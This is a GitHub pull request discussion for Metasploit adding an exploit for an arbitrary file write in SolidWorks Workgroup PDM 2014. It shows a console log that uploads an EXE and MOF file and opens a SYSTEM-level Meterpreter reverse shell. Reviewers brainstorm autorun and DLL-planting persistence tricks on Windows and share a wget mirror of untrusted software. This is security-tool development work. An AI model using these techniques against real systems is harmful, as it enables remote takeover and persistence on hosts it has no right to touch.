Add SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write #3030

Merged
merged 3 commits into from Mar 5, 2014

Projects

None yet

4 participants

@bcoles
Contributor
bcoles commented Feb 24, 2014

Add SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write exploit module.

SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write

msf > use exploit/windows/misc/solidworks_workgroup_pdmwservice_wbem
msf exploit(solidworks_workgroup_pdmwservice_wbem) > set RHOST 192.168.247.134
RHOST => 192.168.247.134
msf exploit(solidworks_workgroup_pdmwservice_wbem) > set VERBOSE true
VERBOSE => true
msf exploit(solidworks_workgroup_pdmwservice_wbem) > check

[*] 192.168.247.134:30000 - Received reply (4 bytes)
[*] 192.168.247.134:30000 - The target service is running, but could not be validated.
msf exploit(solidworks_workgroup_pdmwservice_wbem) > run

[*] Started reverse handler on 192.168.247.128:4444 
[*] 192.168.247.134:30000 - Sending EXE (73802 bytes)
[*] 192.168.247.134:30000 - Received reply (4 bytes)
[*] 192.168.247.134:30000 - Sending MOF (2231 bytes)
[*] 192.168.247.134:30000 - Received reply (4 bytes)
[*] Sending stage (769024 bytes) to 192.168.247.134
[*] Meterpreter session 1 opened (192.168.247.128:4444 -> 192.168.247.134:1314) at 2014-02-24 11:24:01 -0500
[+] Deleted wbem\mof\good\KocTtKc.mof
[!] This exploit may require manual cleanup of: WnwxXUjKQYGyh.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
@wchen-r7
Contributor

Travis build is complaining about msftidy. The fix was already applied in #3031.

So when this PR merges to master, it should be green:

$ git checkout upstream/pr/3030
Note: checking out 'upstream/pr/3030'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b new_branch_name

HEAD is now at a29c6cd... Add SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write
$ git checkout -b master_pr3030_test
Switched to a new branch 'master_pr3030_test'
$ git merge -S --no-ff upstream-master
Merge made by the 'recursive' strategy.
 modules/encoders/x86/opt_sub.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
$ rspec 
ActiveRecord::ConnectionAdapters::ConnectionPool ............
FastLib .....*.....**..
Msf::Simple::Framework .....
Msf::DataStore ............
Msf::Exe::SegmentInjector .................
Msf::Exploit::Capture ..****...
Msf::Exploit::Remote::HttpClient ........................
Msf::Exploit::Remote::HttpServer ......
Msf::Exploit::Remote::BrowserExploitServer .................
Msf::Exploit::Remote::FirefoxAddonGenerator ..
Msf::Framework ...*
Msf::Handler::ReverseHttp::UriChecksum ...........
Msf::ModuleManager .....................................................
Msf::Module .............................................................................................................................................................................................................................................
Msf::Modules::Error .........
Msf::Modules::Loader::Archive ...............
Msf::Modules::Loader::Base ..................................................................................................../Users/wchen/rapid7/msf/lib/msf/core/modules/loader/base.rb:599: warning: already initialized constant Mod0
........
Msf::Modules::Loader::Directory .........
Msf::Modules::MetasploitClassCompatibilityError ...
Msf::Modules::Namespace ........................................
Msf::Modules::VersionCompatibilityError .........
Msf::OptionContainer .
Msf::OptAddressRange ............................
Msf::OptAddress ..............
Msf::OptBool ............
Msf::OptEnum .....
Msf::OptInt ...............
Msf::OptPath .........
Msf::OptPort ..........
Msf::OptRaw .....
Msf::OptRegexp ......
Msf::PayloadGenerator ...........................................*..........................
Msf::Post::Windows::Priv ....
Msf::TaskManager .......
Msf::DBManager::Export ........................
Msf::DBManager .....................................................................................................................................................................................................................................................
Msf::Ui::Console::CommandDispatcher::Core ......
Msf::Ui::Console::CommandDispatcher::Db ....*......**
Msf::Util::EXE ...........................................................................................................
Rex::Encoding::Xor::Byte ..
Rex::Encoding::Xor::Dword ...
Rex::Encoding::Xor::Qword ...
Rex::Encoding::Xor::Word ...
Rex::Exploitation::Js::Detect ...
Rex::Exploitation::Js::Memory ...
Rex::Exploitation::Js::Network ..
Rex::Exploitation::Js::Utils .
Rex::Exploitation::RopDb ..............
Rex::FileUtils ..........
Rex::Parser::NmapXMLStreamParser ....
Rex::Parser::Unattend ....
Rex::Post::Meterpreter::PacketParser ..
Rex::Post::Meterpreter::Tlv .....................
Rex::Post::Meterpreter::GroupTlv ....................***...................
Rex::Post::Meterpreter::Packet ....................
Rex::Proto::Http::ClientRequest ............................
Rex::Proto::Http::Client ......*****.***.........
Rex::Proto::Http::Response .....
Rex::Proto::PJL::Client ................
Rex::RandomIdentifierGenerator ..................
Rex::Socket::RangeWalker .............................
Rex::Socket ...........................
Rex::SSLScan::Result .....................................................................................
Rex::SSLScan::Scanner ....................
Rex::Text ........
Msfcli .........................................
Msfupdate .............................................
CPassword ..
VirusTotalUtility ................

Pending:
  FastLib class methods dump without compression and without encryption cache Fix https://www.pivotaltracker.com/story/show/38730815
    # No reason given
    # ./spec/lib/fastlib_spec.rb:94
  FastLib class methods list with cached dump should have dump cached
    # Fix https://www.pivotaltracker.com/story/show/38730815
    # ./spec/lib/fastlib_spec.rb:202
  FastLib class methods list with cached dump should list archived paths
    # Fix https://www.pivotaltracker.com/story/show/38730815
    # ./spec/lib/fastlib_spec.rb:206
  Msf::Exploit::Capture should confirm that pcaprub is available
    # Need to test this without stubbing check_pcaprub_loaded
    # ./spec/lib/msf/core/exploit/capture_spec.rb:40
  Msf::Exploit::Capture should open a pcap file
    # Provde a sample pcap file to read
    # ./spec/lib/msf/core/exploit/capture_spec.rb:43
  Msf::Exploit::Capture should capture from an iface
    # Mock this? Tends to need root
    # ./spec/lib/msf/core/exploit/capture_spec.rb:46
  Msf::Exploit::Capture should inject packets to an ifrace
    # Mock this? Tends to need root
    # ./spec/lib/msf/core/exploit/capture_spec.rb:49
  Msf::Framework#version conform to SemVer 2.0 syntax: http://semver.org/
    # No reason given
    # ./spec/lib/msf/core/framework_spec.rb:31
  Msf::PayloadGenerator#add_shellcode when add_code points to a valid file returns modified shellcode
    # This is a bad test and needs to be refactored
    # ./spec/lib/msf/core/payload_generator_spec.rb:315
  Msf::Ui::Console::CommandDispatcher::Db#cmd_services -np should list services that are not on a given port
    # refs redmine ticket #4821
    # ./spec/lib/msf/ui/command_dispatcher/db_spec.rb:100
  Msf::Ui::Console::CommandDispatcher::Db#db_nmap should have some specs describing its output
    # Not yet implemented
    # ./spec/lib/msf/ui/command_dispatcher/db_spec.rb:262
  Msf::Ui::Console::CommandDispatcher::Db#db_rebuild_cache should have some specs describing its output
    # Not yet implemented
    # ./spec/lib/msf/ui/command_dispatcher/db_spec.rb:266
  Rex::Post::Meterpreter::GroupTlv#add_tlvs should raise an error when given something other than nil or an array
    # RM #7598
    # ./spec/lib/rex/post/meterpreter/packet_spec.rb:232
  Rex::Post::Meterpreter::GroupTlv#add_tlvs should raise an error when given an array of objects other than hashes
    # RM #7598
    # ./spec/lib/rex/post/meterpreter/packet_spec.rb:237
  Rex::Post::Meterpreter::GroupTlv#add_tlvs should raise an error when any of the hashes are missing a key
    # RM #7598
    # ./spec/lib/rex/post/meterpreter/packet_spec.rb:242
  Rex::Proto::Http::Client should send a request and receive a response
    # need to actually set up an HTTP server to test
    # ./spec/lib/rex/proto/http/client_spec.rb:149
  Rex::Proto::Http::Client should send a request and receive a response without auth handling
    # need to actually set up an HTTP server to test
    # ./spec/lib/rex/proto/http/client_spec.rb:153
  Rex::Proto::Http::Client should send a request
    # need to actually set up an HTTP server to test
    # ./spec/lib/rex/proto/http/client_spec.rb:157
  Rex::Proto::Http::Client should test for credentials
    # Should actually respond to :has_creds
    # ./spec/lib/rex/proto/http/client_spec.rb:161
  Rex::Proto::Http::Client should send authentication
    # Not yet implemented
    # ./spec/lib/rex/proto/http/client_spec.rb:169
  Rex::Proto::Http::Client should perform digest authentication
    # need to set up an HTTP authentication challenger
    # ./spec/lib/rex/proto/http/client_spec.rb:178
  Rex::Proto::Http::Client should perform negotiate authentication
    # need to set up an HTTP authentication challenger
    # ./spec/lib/rex/proto/http/client_spec.rb:182
  Rex::Proto::Http::Client should get a response
    # need to actually set up an HTTP server to test
    # ./spec/lib/rex/proto/http/client_spec.rb:186

Finished in 3 minutes 8.1 seconds
1699 examples, 0 failures, 23 pending
@wchen-r7
Contributor

Restarted travis and passed.

@wchen-r7 wchen-r7 self-assigned this Feb 24, 2014
@wchen-r7
Contributor

@bcoles How do you get a copy of the software without being contacted by sales?

@Meatballs1
Contributor

Register with @todb-r7's mobile

@Meatballs1
Contributor

So I was trying to think of ways to autorun on > Vista but can only think of stuff that will need a restart:

  • c:\windows\system32\gathernetworkinfo.vbs seems to be on most builds but disabled in scheduled tasks

Reliant on processes doing stuff:

  • writing PSConsoleHostReadline.ps1 into the path and hoping some powershell is executed
  • writing a DLL somewhere in the path on some process that is restarted regularly? C:\Windows\System32\wbem\CRYPTBASE.dll?, C:\Windows\System32\msfte.dll?
  • writing some kind of .local or .manifest file for a frequently loaded windows process C:\Windows\WindowsShell.Manifest ? along with a DLL?
@kernelsmith
Contributor

LMFAO

On Feb 24, 2014, at 3:43 PM, Meatballs1 notifications@github.com wrote:

Register with @todb-r7's mobile


Reply to this email directly or view it on GitHub.

@bcoles
Contributor
bcoles commented Feb 24, 2014

@wchen-r7 Have a chat to their friendly sales reps :)

Alternatively, you could try downloading untrusted software from the internet, but I wouldn't recommend it:

wget -m -np hxxp://clubprotege.com/bpt323/Programs/Solidworks%202011/SW2011_sp0_x64_SSQ/pdmwserver/

hxxps://google.com/search?q=intitle:"index of" "solidworks" "workgroup" "msi"

@wchen-r7 wchen-r7 removed their assignment Feb 25, 2014
@wchen-r7
Contributor

@bcoles Yeah I did. Sales asked why I want one, I replied. Never heard from them again.

@bcoles bcoles closed this Mar 2, 2014
@bcoles bcoles deleted the bcoles:solidworks_workgroup_pdmwservice_wbem branch Mar 2, 2014
@bcoles bcoles reopened this Mar 2, 2014
@bcoles
Contributor
bcoles commented Mar 2, 2014

@Meatballs1 I haven't come up with a faster (and non-destructive) method.

Support for writing to startup on Vista and newer has been added in commit f008c77

@wchen-r7 wchen-r7 added a commit that referenced this pull request Mar 5, 2014
@wchen-r7 wchen-r7 Land #3030 - SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary …
…File Write
9d0743a
@wchen-r7 wchen-r7 merged commit 1ea3588 into rapid7:master Mar 5, 2014

1 check passed

default The Travis CI build passed
Details
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment